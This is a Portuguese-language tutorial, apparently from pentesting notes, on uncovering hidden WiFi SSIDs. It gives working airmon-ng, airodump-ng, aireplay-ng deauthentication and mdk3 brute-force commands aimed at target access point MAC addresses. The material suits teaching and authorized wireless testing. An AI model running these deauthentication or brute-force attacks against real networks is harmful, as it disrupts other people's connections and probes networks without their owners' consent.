Finding Hidden SSIDs
Em redes WiFi, o Service Set Identifier (SSID) é o nome que identifica uma rede sem fio específica
Observando a rede oculta
Primeiro, precisamos configurar nossa interface para o modo monitor.
sudo airmon-ng start wlan0
Escaneando Redes WiFi
Podemos usar
airodump-ng
para procurar redes Wi-Fi disponíveis
sudo airodump-ng -c 1 wlan0mon
Detectando SSID oculto usando Deauth
A primeira maneira de encontrar um SSID oculto é executar um ataque de desautenticação nos clientes conectados à rede WiFi, o que nos permite capturar a solicitação quando eles se reconectam
sudo airodump-ng -c 1 wlan0mon
Para forçar o cliente a enviar uma solicitação de sonda, ele precisa ser desconectado. Podemos fazer isso com aireplay-ng.
sudo aireplay-ng -0 10 -a B2:C1:3D:3B:2B:A1 -c 02:00:00:00:02:00 wlan0mon
Após enviar as solicitações de desautenticação usando
aireplay-ng
, devemos ver o nome do SSID oculto aparecer emairodump-ng
assim que o cliente se reconectar à rede WiFi.
Força bruta SSID oculto
Outra maneira de descobrir um SSID oculto é executar um ataque de força bruta. Podemos usar uma ferramenta como o mdk3 para executar esse ataque.
mdk3 <interface> <test mode> [test_ options]
O
p
argumento do modo de teste em mdk3 significa Basic probing e ESSID Bruteforce mode. Ele oferece as seguintes opções:
Opção
Descrição
-e
Especifique o SSID para sondagem.
-f
Ler linhas de um arquivo para forçar brutamente SSIDs ocultos.
-t
Defina o endereço MAC do AP de destino.
-s
Defina a velocidade (Padrão: ilimitado, no modo Bruteforce: 300).
-b
Use o modo de força bruta total (recomendado apenas para SSIDs curtos). Esta opção é usada para mostrar sua tela de ajuda
sudo mdk3 wlan0mon p -b u -c 1 -t A2:FF:31:2C:B1:C4
Força bruta usando uma lista de palavras
Para aplicar força bruta usando uma lista de palavras, podemos usar
-f
otest_option
no mdk3 seguido pela localização da lista de palavras.
sudo mdk3 wlan0mon p -f /opt/wordlist.txt -t D2:A3:32:13:29:D5
Last updated